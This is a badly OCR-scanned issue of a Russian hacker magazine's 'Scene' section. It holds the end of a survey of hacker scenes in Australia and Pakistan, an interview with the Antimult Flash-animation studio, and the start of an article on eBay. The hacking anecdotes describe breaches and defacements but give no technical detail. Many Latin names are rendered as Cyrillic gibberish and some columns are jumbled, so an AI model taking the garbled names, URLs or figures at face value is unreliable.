туалы против террора», которая ломала проис- 
ламисткие сайты, а однажды даже добралась 
до счетов Усамы Бен Ладена. По крайней мере, 
так уверял сам Ким. Не так давно он предлагал 
скачать всем свою программу Тгепбах, с по- 
мощью которой можно грести деньги лопатой 
на брокерских биржах, за пользование софтом, 
правда, требовалось заплатить энную сумму. 
Увы, не все оценили проект немецкого програм- 
миста, итогом стал штраф в несколько сот ты- 
сяч долларов и 20 месяцев условного срока. 
Германия является страной, где постоянно про- 
ходят крупные зесигііу-конференции и хакерс- 
кие тусовки. Чего стоит только ВІаск Наі Зесигііу 
Вгіеііпдз, ежегодно собирающая ИТ-специалис- 
тов со всего мира. 
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хакгруппа С-(огсе взломала 500 индийских сайтов 



АВСТРАЛИЯ 

Нѳ так давно австралийская сцена считалась не 
менее сильной, чем американская. Да один ле- 
гендарный Мепсіах чего стоит! Если кто забыл, 
напомню, что Мендакс с парой товарищей по 
группе Іпіегпаііопаі ЗиЬѵегзіѵез получил полный 
контроль над крупнейшей телефонной компани- 
ей Ыоііеі, работающей по всему миру. При жела- 
нии ребята могли разнести только зарождавшу- 
юся тогда глобальную сеть, но были пойманы и 
отсидели свой срок, Мендакс нынче работает в 
полиции, что-то типа нашего отдела «К», а 
австралийским компьютерщикам остается толь- 
ко мечтать о былом могуществе. Хотя какие-то 
экземпляры имеются и тут. 

Виток Боден, например, резко невзлюбивший 
родной Мельбурн и взломавший компьютерную 
систему управления канализацией города. В ре- 
зультате этого в реки и каналы города хлынули 
литры нечистот. Загрязнение воздуха и приб- 
режных вод обошлось злодею двумя годами ли- 
шения свободы. 



Группа хакеров «Реіі» отличилась в вардрай- 
винге. Точнее, в ІІу-бгіѵіпде. Пролетая над Сид- 
неем, они взломали около 93 точек ѴѴі-Рі. По их 
мнению, именно самолет является лучшим мес- 
том для взлома беспроводных сетей. 

В России все долго переживали насчет баз 
данных, где была представлена информация о 
заработной плате москвичей. Это что! Один 
австралийский хакер, взломав госбанк, опуб- 
ликовал в сети информацию о 17 000 его кли- 
ентах. Причем ни единого цента не прикарма- 
нил — вайт хэт, однако. Уголовного дела воз- 
буждено не было, а вот админам банка, пола- 
гаю, пришлось несладко. 

Из современных групп в Австралии можно отме- 
тить разве что 311. Это хакеры-антиглобалисты, 
занимающиеся, в основном, дефейсом порталов 
крупных международных компаний. Недавно от- 
метились взломом Ыіке.сот . обвинили кроссов- 
коделов в спонсировании Олимипиады. 

Среди вирмейкеров прославился Магіо, автор 
виря «Зесопб РаіІТо НеІІ», ставшего первой лас- 
точкой среди червей под ѴѴіпбоѵѵз ѵізіа. Стоит 
добавить, что первые макровирусы под М3 ѴѴогб 
были тоже написаны австралийцами, группой 
Іпіегпаі. Но в целом нынешняя австралийская 
сцена меня не впечатлила. Мендакс, вернись! 




Внимание, разыскивается хакер! 




ПАКИСТАН 

Пакистанские хакеры стали известны мировому ИТ- 
сообществу, когда объявили киберджихад Индии. 
После прекращения войны в Кашмире хакгруппа С- 
Ьгсе взломала 500 индийских сайтов, в том числе 
правительственных, на которых хакеры размеща- 
ли лозунг «Аллах Акбар!» и требовали вернуть 
штат Кашмир Пакистану. Индусы в долгу не оста- 
лись и распространили вирус Уаба-О, цель кото- 
рого заключалась в ЭЭоЗ-атаках на пакистанские 
серверы. Как оказалось позже, на Индии пакис- 
танцы только тренировались, так как в сентябре 
2001 года начались массированные атаки на пра- 
вительственные порталы США. Впрочем, в них 
участвовали не только пакистанцы, но и другие 
хакеры-мусульмане. Акция была направлена в 
поддержку Бен Ладена и талибов. Наибольшую 
активность в этих событиях проявили вышеупомя- 
нутая О-Форс, а также «Пакистанский клуб хаке- 
ров» во главе с Эг.Ыикег-ом. Вообще, взламывать 
американские сайты стало своего рода традици- 
ей у хакеров всего мира. То ли США не любят, то 
ли президента Буша, а может, статуя Свободы их 
раздражает? 

Практически ничего не слышно об аресте ки- 
берпреступников в Пакистане. Есть даже мне- 
ние, что деятельность хакеров финансируется 
на государственном уровне. Так что нашему от- 
делу «К» можно на заметку брать и таланты не 
сажать, а использовать их во благо страны. 



Убедился, что хакерство вездесуще и 
не знает границ? То-то же. А ведь 
я еще не рассказал о голландцах с их 
выдающимися вирусописателями и 
фестивалем хакеров в Амстердаме, 
об Испании с ее сильными сетевыми 
взломщиками, об Аргентине, где про- 
живает масса разработчиков ореп- 
зоигсе, Индии, отдельные города кото- 
рой становятся центрами разработки 
ПО, превращаясь в азиатские силико- 
новые долины, и многих, многих дру- 
гих странах и уголках мира. Так что 
мы, хакеры, скоро проникнем в самые 
удаленные уголки планеты и устано- 
вим новый компьютерный мировой по- 
рядок. Точная дата этого события бу- 
дет указана в одном из следующих но- 
меров твоего любимого журнала. 
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ИНТЕРВЬЮ СО СТУДИЕЙ «АНТИМУЛЬТ» 



ІІСРЕДИ СОВЕТСКИХ МУЛЬТФИЛЬМОВ МАЛО ТАКИХ, КОТОРЫЕ МОГЛИ БЫ 
ЗАТРОНУТЬ МОЕ ЧЕРСТВОЕ СЕРДЦЕ. ДА И ГОЛЛИВУД В ПОСЛЕДНЕЕ ВРЕМЯ 
ХАЛЯВИТ. ПОЭТОМУ, КОГДА МНЕ ДОВЕЛОСЬ ПОЗНАКОМИТЬСЯ С ТВОРЕНИЯМИ 
СТУДИИ АНТИМУЛЬТ, Я БЫЛ ПРИЯТНО УДИВЛЕН. МУЛЬТЫ, КОТОРЫЕ ДЕЛАЮТ ЭТИ 
РЕБЯТА, СОБРАНЫ НА ЕЬАЗН, А НЕДОСТАТОК АНИМАЦИИ КОМПЕНСИРУЕТСЯ 
ГЛУБОКИМИ, АКТУАЛЬНЫМИ ДЛЯ НАШЕГО ВРЕМЕНИ СЮЖЕТАМИ И КЛАССНОЙ 
ОЗВУЧКОЙ. АНТИМУЛЬТ ПОЯВИЛСЯ СОВСЕМ НЕДАВНО И УЖЕ УСПЕЛ ЗАВОЕВАТЬ 
СВОЮ АРМИЮ ПОКЛОННИКОВ. ЧТОБЫ УЗНАТЬ ПОДРОБНЕЕ О КОЛЛЕКТИВЕ, 
КОТОРЫЙ ПРИДУМАЛ ФИНУ И КЛАВДИЮ НИКИТИЧНУ, Я СВЯЗАЛСЯ С ОДНИМ из 
РУКОВОДИТЕЛЕЙ СТУДИИ И ЕЕ ИДЕЙНЫМ ВДОХНОВИТЕЛЕМ — МАКСОМ 
КУДЕРОВЫМ — И ДОГОВОРИЛСЯ ОБ ИНТЕРВЬЮ, рр 
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ТЕХТ М№ѴѴОНК / МІМО\ЛГОВКСЛМЕІ_ЛМО.РІІ / 




тіпсІѵѵОгк: История рождения студии «Антимульт» вкратце изложена 
на сайте. Тем не менее, хочу задать вопрос, как все было, так как 
уверен, что самое интересное осталось за кадром. Расскажи нео- 
фициальную версию того, как все начиналось, с какими трудностя- 
ми вам приходилось сталкиваться и как вы их преодолевали. 

Макс Кудеров (МК): Мы люди честные, откровенные, в чем-то даже 
наивные. Поэтому, то, что написано на сайте, — правда, мы ничего не 
скрывали. Хотя. . . не помню, написано ли там, что вся затея была на- 
чата с единственной мыслью — это единственный проект всерос- 
сийского (и даже мирового) масштаба, который мы могли начать у се- 
бя в Тольятти, практически не вкладывая денег. Трудностей никаких, 
в общем-то, и не было: первые года полтора мы не пытались зарабо- 
тать на проекте, выделяя на него из нашего скромного бизнеса еще 
более скромную сумму. Потом деньги пришли к нам сами. Мы позна- 
комились с нашим поклонником, товарищем Иваном Засурским, из 
холдинга ВатЫег, и вскоре мы сделали серию рекламных роликов к 
7-летию компании. Все остальное можно прочитать у нас на сайте. 

тіпсІѵѵОгк: Хотелось бы побольше узнать о команде студии «Анти- 
мульт». У вас на сайте все так кратко, совсем непонятно. В чем про- 
является «стремительность» Максима и «медлительность» Андрея? 
Чем вы увлекаетесь, как проводите время, какие у вас вредные при- 



, создания своего (ІазН-сериала пришла Максиму Кудерову осенью 2002 
на волне успеха Масяни. В это время вместе с Андреем Саимаковым 
альей Овчинниковой они выпускали популярную в Тольятти газету 
недельник». Но замысел Максима друзья поддержали. Первым делом 
окали талантливого художника (Илья Малкин) и аниматора (Илья Никитин), 

>м арендовали помещение и приступили к разработке концепции будущих 
ектов. Стараясь не уподобиться многочисленным подделкам, К0ПИ Р^ Ф 
-яню ребята во всем пытались быть неординарными. Так появился слоган 
™» который быстро перерос в «Антимульт» и стал названием студии. 

.вных персонажей сериала выдумывали все вместе. фина ~ краСИВ ^ а 
•ргичная девушка, руководящая рекламным агентством «АнтиРВ», была 
іпирована с Натальи Овчинниковой, затем появились дизайнер Паша 
килой креативщик Лев Давыдович, вечно ворчливая уборщица Клавд 
китична и злоупотребляющий электрик, который в итоге не "РИ“ 
езентация первой серии АнтиРБ под названием «Реклама - это 
човное» состоялась в апреле 2003 года и оказалась на удивление шумной, 
прошел незамеченным и второй мульт серии - «Говно». Студией 
интересовались рекламодатели, и стгшо, наконец, возможным получать _ 
кую-то материальную отдачу от проекта. Продолжая выпускать свои главны 
риал про Фину, «Антимульт» экспериментировал с новыми жанрами и 
іми. В результате этого появился знаменитый Зплоке КІІІз, который был 
Л ит на 'ЛААлА/.пеѵѵагоип бзюош и завоевал большую популярность сред 
южуев. Были попытки спародировать культовый НарруТгее Рпепбз но 
-тановилась на одной единственной серии, так как авторы не хотел 
'таваться в тени оригинала. Дальше с^дия постоянно развивалась, коллектив 
снялся (хотя костяк остался прежним), и на данный момент новые 
ультфильмы «Антимульта» являются одними из самых ожидаемых в рунете. 
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вычки и взгляды на жизнь? Расскажи о каждом человеке в студии, 
какими их запомнил за время совместной работы. Как пронырливый 
журналюга, особенно буду рад разным компроматам. 



МК: Наше главное преимущество — мы дополняем друг друга. Про- 
является это просто: Максим Кудеров немного взбалмошный, весь 
в новых идеях и стратегических ориентирах, слишком неаккуратен 
и добр к сотрудникам студии. 

Андрей Саймаков — полная противоположность: аккуратен, мето- 
дичен, взвешен, все делает не спеша и основательно. Прекрасно 
отвечает за оперативную работу студии, и не только студии. Два та- 
ких совершенно противоположных организма прекрасно прижи- 
лись в совместных проектах с 1998 года. Постепенно стали допол- 
нять друг друга и во внерабочее время. Я научил Андрея пить напит- 
ки крепостью выше 15 градусов (водку он до сих пор ни разу не про- 
бовал, коньяком иногда балуется), на горные лыжи его поставил. 
Андрей меня приучил к аккуратности и определенной приземлен- 
ное™, насколько это было возможно. 

Теперь о каждом в студии. 

Максим Демкин: художник, честно говоря, придя в студию, пон- 
равился своими работами не сразу. Но со временем заметно 
прогрессировал и теперь является нашей опорой и главным ху- 
дожником. Известен своими безбашенными прическами и лю- 
бовью к профессиональному фото. На новый год Саша Шаховс- 
кой ножницами сотворил на голове Макса ирокез, поставив его 
вертикально раствором сахара. 



МК: После появления «Масяни» — в техническом плане мультика 
предельно примитивного — стали, как грибы после ливня, появ- 
ляться десятки клонов. И тут вдруг оказалось, что главное — это 
не нарисовать и анимировать, а придумать, что именно нарисо- 
вать. Придумать Идею. Как ее придумать — это все равно, что 
спросить, а как написать музыкальный хит или интересную книж- 
ку. Придумать и все — вот и весь рецепт. 

А дальше все просто. Идея в виде сценария пишется на 2 — 4 
страницы в файл ѴѴогф распечатывается. По этому сценарию 
делается раскадровка. В среднем 5-минутный мультфильм — 
это около 40 — 50 кадров-планов. Каждый план — это один век- 
торный рисунок, который в дальнейшем создается в 
Масготебіа РгееЬапб, иногда с использованием программы 
Раіпіег (не путать с Раіпі!). Но это уже не для Интернета, так как 
растровые фоны слишком много весят, и никто потом не захо- 
чет скачивать 10 — 15-мегабайтный двухминутный мультик. Век- 
торные изображения фонов и героев анимируются в РІазЬ МХ. 
После этого на самый обычный компьютерный микрофон, о по- 
мощью программы Зоипб Рогде пишется звук и в том же РІазИ 
МХ вставляется в мульт, который мы и закачиваем на сайт или 
отправляем заказчику на первый просмотр. 

тіпеІѵѵОгк: Отдельно хочу похвалить подбор музыки для многих муль- 
тов. Андрей Саймаков меломан? Как ему удается так хорошо через 
музыку передать атмосферу действия? 




Александр Шаховской: немного знает японский, почти не ест, но ге- 
ниально рисует. Скорее всего, осядет где-нибудь в японской анима- 
ционной студии ѲЬІЫІ. 

Сергей Федоров: сначала хотели его уволить за лень и раздолбай- 
ство, потом просто урезали зарплату до смешного уровня. Сейчас 
вроде образумился, даже что-то рисует. Без булок не может про- 
жить и дня. 

Павел Кудеров: мой родной брат, анимирует и пишет диплом по спе- 
циальности «Менеджмент» про нашу студию. 

Алексей (апсіе) Федотов: мультики про падонкафф на ибаіі.сот — 
его рук дело. Анимирует для студии «Антимульт». 

Антон Мордасов: сочетает в себе два редких таланта: отлично рису- 
ет и отлично анимирует. Большинство рекламных роликов студии - 
его рук дело. 

Слава Гуськов: пишет замечательную музыку, в лицензионной оз- 
вучке антимультов практически всю музыку написал он вместе со 
Стасом Казаковым. 

Наталья Овчинникова: плещет энергетикой в рекламной тусовке 
Москвы, половина которой ее уже знает. Озвучивает Фину и прив- 
лекает клиентов. 

Лида Кудерова: совсем недавно — Лидия Кочережко. Моя жена, а 
по совместительству менеджер по проектам. Ведет всякую коммер- 
ческую анимацию, общается с заказчиками и художниками. Краси- 
ва, позитивна, активна. 

тіпеІѵѵОгк: Я в этом мало, что понимаю, поэтому для меня и таких, как 
я, расскажи, как происходит процесс создания флеш-мультиков? 
Как появляется идея, как развивается и превращается в мульт? 
Сколько нужно людей и времени, какое оборудование и программы 
вы используете, как происходит взаимодействие команды? 



МК: Андрей — меломан еще тот. Держит много редкой и интерес- 
ной музыки. Фанатеет от Ріпк РІоусІ и в марте едет на концерт Гил- 
мора (бывшего гитариста группы) во Франкфурт. 

Правда, сейчас, когда проект стал абсолютно легальным, музы- 
ку в мультфильмах мы были вынуждены заменить на свою, ли- 
цензионную. И саундтрек, конечно, сильно уступает лучшим ми- 
ровым образцам. 

тіпеІѵѵОгк: Мне, как творческому человеку, интересно, откуда сцена- 
ристы антимультов берут идеи для новых творений (можно на при- 
мере конкретных серий). Приходится придумывать специально, или 
они появляются сами собой? 

МК: Идеи берутся отовсюду. На примере мультфильма «Необрати- 
мость»: меня как-то сильно разозлил наш легкий творческий сту- 
пор, и я на спор сказал Андрею, что за 10 минут напишу хороший 
сценарий. Закрылся в комнате и написал ровно за 10 минут. Прос- 
то взял и записал то, что было в голове. Пример мультика «Птица». 
Было две идеи: сделать антимультик про откаты (был слабенький 
сценарий) и сделать по мотивам фильма «Паук» про странного, не- 
понятного человека. Решили соединить два разных в одном хоро- 
шем. А вообще, на каждый сделанный антимультфильм написано в 
среднем по 3 — 4 сценария, мы просто выбирали лучшие. 

тіпеІѵѵОгк: Какие свои мульты ты считаешь самыми удачными? 
Мне особенно понравился «Настоящая любовь», но интересно 
твое мнение. 

МК: В каждом мультфильме есть свои изъяны, которые немного ре- 
жут глаза, кроме одного антимульта, — «Бывший аллах». Еще мне 
очень нравится «Сасово» и «Птица». 
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тіпсІѵѵОгк: Отдельно назови флеш-мультфильмы других авторов, 
которые ты пересматривал много раз и которые считаешь ше- 
деврами. Как русские, так и зарубежные. Можно со ссылками, 
чтобы мы могли оценить. 

МК: Не могу назвать конкретные мультфильмы, но скажу, что луч- 
шие (ІазИ-мультики делают в студии сНатрсбаоз ( сбатосітаоз.сот . 
кажется), очень смешно-стильные ѵЬеСаПооп ОІоеСаіІооп.сот Ѵ На- 
конец, в плане исполнения гениальна серия .Іоке 01 Тйе Оау — 
очень банальные эротические приколы, но выполненные велико- 
лепно. Мы у них учились. 

тіпсІѵѵОгк: Некоторые считают, что Масяня — по-прежнему остается 
королевой русского флеша. Насколько тяжело конкурировать со 
столь раскрученным именем, и поддерживаете ли вы какие-нибудь 
отношения с тиН.ги ? 

МК: В каком смысле конкурировать? Масяня сделала великое дело: 
если бы не было Масяни, мы бы не добились такого успеха. Она 
проложила путь и показала, что интересные зрителю мультики мож- 
но делать самому (хотя до Масяни их, конечно, давно уже делали за 
рубежом). Что касается конкуренции, то заказчиков у нас наверня- 
ка намного больше, чем у «мульт.ру». Да и когда это было — Мася- 
ня? Вот ты про МЗ-ЭОЗ помнишь? А про ѴѴІпсіоѵѵз 3. 1 1 ? Надо вперед 
идти, а не пытаться жить морально устаревшим прошлым. Есть уже 
новое поколение студий, делающих не менее профессиональный 
флеш. Например, Типбга в том же Питере. Или Тоопдцш в Киеве. 
А Масяня навсегда останется первой королевой флеша. 



тіпсІѵѵОгк: В некоторых сериях АнтиРР появляются реальные 
персонажи: Борис Гребенщиков, Илья Лагутенко, К. Эрнст. 
Вы не боитесь, что некоторые моменты их могут задеть или да- 
же обидеть? Тот же БГ показан эдаким старым маразматиком. 
Есть фигуры и посерьезнее — например, Путин. Вдруг не пой- 
мет юмора :). 

МК: Борис Гребенщиков, посмотрев про себя мультфильм, как 
нам сказали, совсем не обиделся. Тем более что мультфильм-то 
неоднозначный. Насчет чертика, похожего на Лагутенко, повара 
в аду, похожего на Макаревича, и прочих персонажей... если кто 
и соберется подать на нас в суд — что ж, мы будем только счаст- 
ливы. Отличная реклама. Насчет Путина — вопрос отдельный. 
Во-первых, там тонкий юмор и Гаранта Конституции мы никак не 
оскорбляем. Во-вторых, посмотрев мультфильм Зтоке КІІІз, один 
из советников Президента, говорят, стал инициатором заказа в 
нашей студии мультфильма для выступления Путина в Шотлан- 
дии на собрании “Большой восьмерки”. 

тіпсІѵѵОгк: Думаю, ваших героев каждый зритель воспринимает по- 
своему. Кто-то считает Фину очень одинокой, для кого-то она вопло- 
щение гулящей девчонки и т.д. А как вы относитесь к своим персо- 
нажам, какими их видите? Может быть, вы знаете о героях АнтиРР 
что-то, чего не знаем мы? 

МК: Как раз наоборот, наши зрители знают о наших героях гораз- 
до больше, чем мы. Также, как любая учительница литературы рас- 
скажет о героях Достоевского столько, что сам бы Достоевский с 




тіпсІѵѵОгк: Как появились на свет ваши основные герои: Фина, 
Паша, Лев Давыдович, Клавдия Никитична. Есть ли у них про- 
тотипы? Насколько я знаю, Фина во многом похожа на Ната- 
шу Овчинникову, которая ее озвучивает. А в чем именно? На 
кого у вас похож Паша и с кого вы скопировали столь коло- 
ритную уборщицу? 



удовольствием бы послушал. 

тіпсІѵѵОгк: С удивлением смотрел последнюю серию «Антинеобра- 
тимость» . Куда это вы Финочку отправили? Что без нее будут делать 
Паша и дядя Лева с тетей Клавой, что случилось со студией Ан- 
тиРВ? Если у Фины есть муж и ребенок, почему про них ничего не 
говорилось раньше? 



МК: Все герои родились практически одновременно. А прототи- 
пом выступила наша же компания — «Понедельник РР», кото- 
рую и возглавляла тогда Наталья Овчинникова. И был у нее в 
чем-то похожий Паша-дизайнер. Остальные — собирательные 
образы. 

тіпсІѵѵОгк: Похожа ли атмосфера в студии АнтиРР на вашу студию? 

МК: Ни капли. В нашей студии веселее. На Новый год в тольятти- 
нской офисе вообще соорудили в студии юрту-кальянную и за- 
пустили полную ванную живых рыб. 

тіпсІѵѵОгк: Я не совсем понял, чем в АнтиРР занимается Лев Да- 
выдыч (кстати, почему у него зеленые волосы)? О нем и его 
прошлом почему-то совсем не говорится в мультах. 

МК: Лев Давыдыч был задуман как неожиданный персонаж — 
молодящийся дедушка, старающийся поспевать за временем, а 
потому не чурающийся зеленых волос и порнографии. У нас был 
задуман еще и электрик-алкоголик, однако пятого персонажа 
сериал не тянет. Внимание уже теряется. 



МК: «Антинеобратимость» — это последняя серия. В ней как бы 
скомкана вся жизнь Фины: от детства в Сасово до окончания 
карьеры. Все предыдущие серии показывали лишь малую часть 
ее жизни: в самой середине, еще до политического пиара, до 
развития ее фирмы, замужества и рождения ребенка. Честно го- 
воря, к выпуску нашего ОѴО мы хотели сделать законченный се- 
риал, с финалом. Но скажу по секрету впервые широкой аудито- 
рии, что в феврале стартует продолжение, где Фина возвраща- 
ется из Тибета. У нас уже лежит три утвержденных сценария пер- 
вых трех серий, а на подходе — четвертый. 

тіпсІѵѵОгк: Что, по-твоему, сейчас способно насмешить людей или 
затронуть до глубины души? Какие темы больше всего востребова- 
ны у современного зрителя? 

МК: Смешить людей сложнее, чем «трогать до глубины». Поэтому в 
российском кинематографе последние лет 20 не делали хороших 
комедий. Современный зритель не хочет напрягаться, он не хочет 
много думать, скучать, сильно переживать. Он хочет, как говорят 
американцы, Энтертейнмент — развлечение, где есть качественный 
сюжет и достойное исполнение. 



ХАКЕР 03 /87/ 06 



117 



СЦЕНА ///// ІЗЗІІЕ 




тіпсІѵѵОгк: У вас часто в мулыах проходит тема политики. Насколько 
я знаю, политика — одна из самых неинтересных компьютерщикам 
тем. А ведь именно интернетчики — ваши основные зрители. Поче- 
му же вы так часто возвращаетесь к этой теме? 

МК: Мы показываем ровно столько политики, сколько ее есть в на- 
шей повседневной жизни. Политика — тема неинтересная, но Путин 
в кимоно и с нунчаками на гвоздике вызывает улыбку. Это политика 
или уже нет? 

тіпсІѵѵОгк: Сюжет или отдельные моменты некоторых серий («Холод- 
ное лето», «Птица», «Мама») мне показались немного запутанными. 
Уверен, молодое поколение может вообще не понять заложенную в 
глубине идею. Что ты об этом думаешь? 

МК: Я думаю, что эти мультфильмы будут смотреть и через 10 лет, и 
через 20. Это не одноразовые смешинки. А молодое поколение не 
стоит недооценивать — оно уважает настоящее и глубокое. 

тіпсІѵѵОгк: Когда какой-то креативный проект становится популяр- 
ным, его авторы получают кучу отзывов и предложений. Расскажи 
про самые интересные письма или посты на форуме, которые тебе 
доводилось читать. 

МК: Интернет — это большей частью анонимная помойка. И фо- 
рум любого проекта, в том числе нашего, полон негативных отзы- 
вов. Нам писали про то, что мы «продались Юкосу», а один муж- 
чина чуть ли не в слезах после мультфильма «Сасово» писал 
гневное: «Фина не такая! Да она бы никогда!». Давным-давно, 
когда у нас еще и форума-то не было, а одна гостевая книга, фа- 
наты превратили ее чуть ли не в чат — можно было обновлять 
каждые 5 минут и читать новые посты. 

тіпсІѵѵОгк: За что вас чаще всего ругают поклонники? И за что чаще 
всего хвалят? 

МК: За что хвалят и так понятно, это неинтересно. А вот ругают 
нас за «плохие сюжеты — сценаристов найдите себе», «у Фины 
в разных сериях грудь разная — то больше, то меньше», «озвуч- 
ка плохая», мы «продажные сволочи», у нас «мало юмора». И 
после каждой серии с самого начала проекта пишут: «Все. "Ан- 
тимульт” сдал». У нас это обычно вызывает улыбку, а защищают 
в тех же форумах нас наши же фанаты. 

тіпсІѵѵОгк: Не задумывались ли вы о создании полноценного флеш- 
фильма, часа эдак на полтора? Вообще, существует ли что-то по- 
добное, и как ты считаешь, может ли такой проект стать успешным 
(в том числе коммерчески) в России? 

МК: Вполне возможно. Этой весной в России состоится премье- 
ра первого полнометражного мультфильма, сделанного на 
флеш-технологии. Насколько он окупится, сказать сложно, но 
вполне может быть, потому что сделать качественный полномет- 
ражный флеш-мультик можно за $100,000, а мультфильм в тра- 
диционной технике обойдется от $1 млн. Хотя, безусловно, флеш 
сильно уступает в качестве. Тут есть еще одна тонкость. За ми- 
нуту мультика платят около $40 — 50, которые еще надо продать. 
Мы за те же $40 — 50 делаем секунду коммерческой анимации. 

тіпсІѵѵОгк: Планируете ли вы открыть новую серию мультов с совер- 
шенно новыми героями? Если даже нет, о чем бы ты хотел сделать 
новый сериал, имея на это время и возможности? 



МК: Да, у нас есть пара замечательных идей, но занятость зара- 
батыванием денег не позволяет их реализовать. Честно говоря, 
делать творческий проект типа нашего — весьма трудоемко и 
совсем невыгодно. 

тіпсІѵѵОгк: Как я понимаю, основной доход ваша студия получает от 
создания рекламных роликов. Вы ищите своих клиентов или клиен- 
ты уже находят вас сами? 

МК: Благодаря нашему некоммерческому сериалу все клиенты на- 
ходили нас сами, а не наоборот. Недостатка мы в них не испытыва- 
ли никогда. Но с открытием московского офиса процесс пошел 
обоюдный — мы наших клиентов тоже ищем. 

тіпсІѵѵОгк: Часто происходит так, что первоначально чисто творчес- 
кий проект, создаваемый талантливыми людьми, с обретением ус- 
пеха привлекает кучу спонсоров. И все больше скатывается в ком- 
мерцию, теряя креативную жилку. Не боитесь, что это может прои- 
зойти и с вами? А Паша в следующих мультах начнет рекламировать 
резиновых Фин, продаваемых в магазине? 

МК: Не боимся. С одной стороны, мы с самых первых серий 
приучили наших зрителей к вполне конкретным вещам вокруг 
героев, поэтому никто не знает, платят нам за это или нет. 
Все уже привыкли. Я вообще не понимаю людей, которые, 
посмотрев какой-нибудь «Дозор», потом плюются: «Фу, рек- 
лама Ыезсаіе (Кіокіа, Магба, МТС)». Как будто от этого фильм 
стал хуже. С другой — да, мы будем рады заработать на про- 
екте еще больше денег Потому что мы любим деньги, мы лю- 
бим их зарабатывать, любим тратить, любим, когда на карте 
Ѵіза много нулей. Поэтому отвечаю на твой вопрос вполне 
конкретно: не боимся, мы этого хотим. Но поверь, результат 
от этого хуже не станет. Резиновых Фин мы продавать не бу- 
дем, но только потому, что это не понравится приличным рек- 
ламодателям, и мы больше потеряем, чем приобретем. Мы ро- 
мантичные, циничные люди. 

тіпсІѵѵОгк: Как считаешь, можно ли флеш-анимацией сейчас зараба- 
тывать в России приличные деньги? Какие для этого должны быть вы- 
полнены условия? 

МК: Можно. Я знаю, как минимум, 5 человек, зарабатывающих по 
$2 — 3 тысячи в месяц, причем живут они в таких местах, где сред- 
няя зарплата $100 — 300. У нас уже довольно приличный оборот 
для флеш-студии, но пока еще вкладываем, а не зарабатываем. 
Мы вложились в создание офиса в Москве, уже месяца 4 вкла- 
дываемся в начало производства полнометражного мультфиль- 
ма по смешанной технологии, близкой к классической анимации 
и в чем-то ее превосходящей. 

тіпсІѵѵОгк: Признание твоей работы у кого доставит тебе наи- 
большее удовольствие? 

МК: У Хаяо Миядзаки и у 12-летнего брата моей жены. 

тіпсІѵѵОгк: Есть ли у тебя мечта касаемо Антимульта, которой ты 
можешь поделиться с нами? 

МК: Мы сделаем мультфильм (не на технологии ЯазИ), который 
соберет в мировом прокате $100 миллионов. Это будет наш 4-й 
или 5-й полнометражный мульт. 

вінакѵ ѵоив’5 зс 
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телевидение 1 



МУЗЫКАЛЬНОЕ 



тіѵ в твоей мобиле 



Г Г 9 
Г Г 9 
Г Г 9 
Г Г 9 
Г Г 9 
Г Г 9 
Г Г 9 
Г Г 9 
Г Г 9 




СЦЕНА 



■ 

ТЕХТ МІРПІІ_І_/ МІГШШЗКІООІСК.ПІІ / 

ПОЧЕМ 

ОПИУМ 

ДЛЯ НАРОДА? 

ВСЯ ПРАВДА 

ОЕВАУ 




Ты хочешь сделать своей подружке на День Рождения необыч- 
ный подарок в виде шоколадной статуи свободы? Ты закорене- 
лый коллекционер марок и мечтаешь добавить в свою коллек- 
цию марочную серию «Поезда» от 1940 года? Ты миллиардер 
и подумываешь, не приобрести ли тебе собственный остров в 
Тихом океане? Несколько лет назад тебе пришлось бы изрядно 
попотеть, чтобы найти, где достать все это. Но только не сегод- 
ня. Так как теперь, чтобы купить самую невообразимую вещь, 
достаточно ввести в браузер ссылку еВаѵ.сот . Все верно, мой 
сегодняшний рассказ о крупнейшем в мире сетевом аукционе, 
о котором ты наверняка слышал. Но подробно о нем узнаешь 
только сейчас. 
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партия в гольф 
с легендарным гольфис- 
том Тайгером Вудсом 

($425,000) 



двигатель от самолета Ѳгиттап СиІІзІгеат II 

($4,9 млн.) 



340-летняя копия рукописи Уильяма Шекспира 
«Перикл», чудом пережившая Великий Пожар 
в Лондоне в 1666-м году 

($5 млн.) 



курорт на озере Даймонд Лейк, 
западный Кентукки 

($1,2 млн.) 



баскетбольная карточка с изображени- 
ем Йонаса Вагнера 1909 года 

($1 ,65 млн.) 



бита известнейшего баскет- 
болиста Джозефа Джексона 

($577,610) 



Реггагі Еп 20 ($975,000) 







СЦЕНА 



23-го ноября 2004 года с молотка ушел 
бутерброд с сыром, на котором проявился 
лик Девы Марии. Победителем торгов стало 
уже знакомое нам казино ѲоІсІепРаІасе.сот . 
Продавщица лота заявила, что увидела лик 
Богоматери в хлебе в 1994-ом, когда делала 
себе сэндвич. Улицезрев чудо, она сразу же 
запаяла бутерброд в герметичный пластик, 
где он хранился десять лет, пока не был про- 
дан за кругленькую сумму в $28,000. 



В 2004 году мужчина из Сиэттла выставил 
на продажу свадебное платье своей бывшей 
жены. В качестве иллюстрации прилагалось 
его фото, одетого в это самое платье. На 
самом деле он просто хотел сделать рекламу 
своего лота более необычной и заработать 
хоть немного денег, чтобы купить билеты на 
бейсбольный матч с участием любимых ЗеаМе 
Магіпегз. Информация о необычном лоте рас- 
пространилась по Сети и даже по СМИ со 
скоростью лесного пожара. Вскоре ставки 
на лот достигли нескольких тысяч долларов, 
а незадачливому аукционеру поступил целый 
ряд предложений сыграть свадьбу. 



В июне 2005 года Керолин Смит продала 
свой лоб как рекламное место для татуировки 
заказчика. Покупателем стало интернет-кази- 
но СоІсІепРаІасе.сот , заплатившее женщине 



Студент Университета Ковентри 
продавал кукурузные хлопья по 
$1,50 за штуку, кстати, весьма 
успешно. 



Человек из Сиднея положил в 
карман $1,035, успешно продав 
на еВау кусочек батончика ІЧиІгі- 
Сгаіп, по форме очень напоминаю- 
щего странного гуманоида. 



В 2004 году за $1691 ,66 было продано право 
первому прокатиться на Кіпдба Ка. 





КАК ВСЕ НАЧАЛОСЬ? 

Отцом-основатѳлем еВаѵ.соіті в 1995 году 
стал Пьер М. Омидьяр. В то время он работал 
на компанию ѲепегаІ Мадіс, которая занима- 
лась мобильными коммуникациями, но в душе 
больше тяготел к ІТ. Особенно Пьера интере- 
совала тема продаж через Интернет, так как 
он уже успел поработать в еЗИор Іпс и видел в 
этой сфере бизнеса огромные возможности. 
В 1997 году, для подогрева интереса прессы 
к ЕЬау, РВ-менеджеры компании придумали 
красивую сказку о его появлении, звучав- 
шую примерно так: «Идея создать не просто 
интернет-магазин, а аукцион, пришла Пьеру 
в голову за ужином. Он сидел за столом со 
своей подругой Памелой Уэсли, та рассказала 
о своем хобби — коллекционировании коробо- 
